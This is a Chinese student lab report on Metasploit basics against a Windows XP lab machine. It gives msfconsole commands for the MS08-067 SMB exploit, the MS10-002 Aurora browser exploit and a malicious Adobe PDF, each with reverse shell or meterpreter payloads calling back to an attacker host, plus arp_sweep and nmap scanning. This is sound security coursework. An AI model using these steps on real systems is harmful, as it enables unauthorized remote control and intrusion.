EXP5 msf基础应用

一、基础知识回答

  • 用自己的话解释什么是exploit,payload,encode
    • exploit:漏洞利用,与靶机进行交互,攻击靶机的最后一步
    • payload:有效载荷,后面一般加要对靶机进行攻击的代码,可以实现任何运行在受害者环境中的程序所能做的事情
    • encode:编码器,对代码进行异或运算、去除坏字符等等,保护payload不被发现

      二、实践过程

  • 1.Windows服务渗透攻击——MS08-067安全漏洞

  • MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。
  • 我们利用这个模块进行主动攻击。
  • 调用该模块,并且查看可以使用的payload
    use exploit/windows/smb/ms08_067_netapi show payloads

     

  • set payload generic/shell_reverse_tcp设置payload,tcp反向回连
  • set LHOST 192.168.53.131 攻击机kali ip
  • set LPORT 4306攻击端口
  • set RHOST 192.168.53.132靶机winxp ip
  • set target 0自动选择目标系统类型,匹配度较高
  • show options看一下配置是否都正确

     

  • exploit开始监听。
  •  

  • 成功获取win xp的系统权限

     

2.2 MS10_002_aurora漏洞攻击

  • ms10_002台风漏洞是IE浏览器漏洞,也是黑客挂马利用的最热门漏洞。
  • msf > use windows/browser/ms10_002_aurora调用该模块
  • set payload windows/meterpreter/reverse_http设置http反向回连
  • 依旧是设置攻击机ip、攻击端口
  • set URIPATH 4306zss设置统一资源标识符路径
  • 开始监听

     

  • 成功生成一个URLhttp://192.168.53.131:8080/4306zss

     

  • 在win xp的IE浏览器中访问该地址,显示空白(要关掉xp上的杀毒软件)

     

  • 回头来看kali这边已经攻击成功了(见上上一张图),ipconfig试一下

2.3 针对Adobe的攻击

  • use exploit/mulit/fileformat/adobe_u3d_meshcont选用该模块,但是好像用不了
  • use exploit/windows/fileformat/adobe_toolbutton换一个模块
  • set payload windows/meterpreter/reverse_tcp设置tcp反向回连

     


  • show options查看要设置哪些东西

     

     
  • 根据要求设置好了,然后开始监听

     


  • 接下来就要和之前左后门实验一样,把刚刚生成的pdf文件(在指定的路径里面找到)放到xp上,各种设置回连监听啥的
  • 然后在xp上用Adobe Reader打开pdf

     

  • kali这边攻击成功,一样的ipconfig

     

2.4 辅助模块应用

    • 我选了arp_sweep模块,这是一个可以扫描端口、各种连接等等的模块
    • 进入该模块
    • set interface eth0 ,set RHOSTS 192.168.53.132设置靶机ip,set threads 2
    • run开启扫描,成功地扫描到靶机

       

    • nmap 192.168.53.132开启nmap扫描,可以看见开启的端口号,以及靶机的操作系统

       

posted @ 2018-04-20 10:38  20154306  阅读(189)  评论(0编辑  收藏  举报